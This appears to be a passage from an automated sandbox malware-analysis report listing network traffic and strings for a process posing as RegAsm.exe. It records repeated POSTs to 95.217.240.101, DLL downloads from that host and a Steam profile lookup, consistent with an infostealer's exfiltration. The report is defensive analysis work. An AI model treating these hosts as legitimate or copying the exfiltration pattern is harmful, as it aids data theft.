                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 116501Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.217.240.101
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040514C _EH_prolog,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,3_2_0040514C
                  Source: global trafficHTTP traffic detected: GET /profiles/76561199686524322 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /sqlx.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHJEBGHJKEBFHIJDHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1Host: 95.217.240.101Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000003.00000002.2044042072.000000001928D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://95.217.240.101
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/freebl3.dlls
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/mozglue.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/msvcp140.dllU
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/nss3.dll2
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/softokn3.dllK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/sqlx.dll
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/v
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101/vcruntime140.dll
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101FIE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.240.101KJE
                  Source: JEGHDA.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000001068000.00000004.00000020.00020000.00000000.sdmp, IIDHJD.3.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                  Source: JEGHDA.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: JEGHDA.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: JEGHDA.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=5CgcHEsWGA
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=yF_q
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=dERfFkkJ-bKK&amp
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, 76561199686524322[1].htm.3.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/he
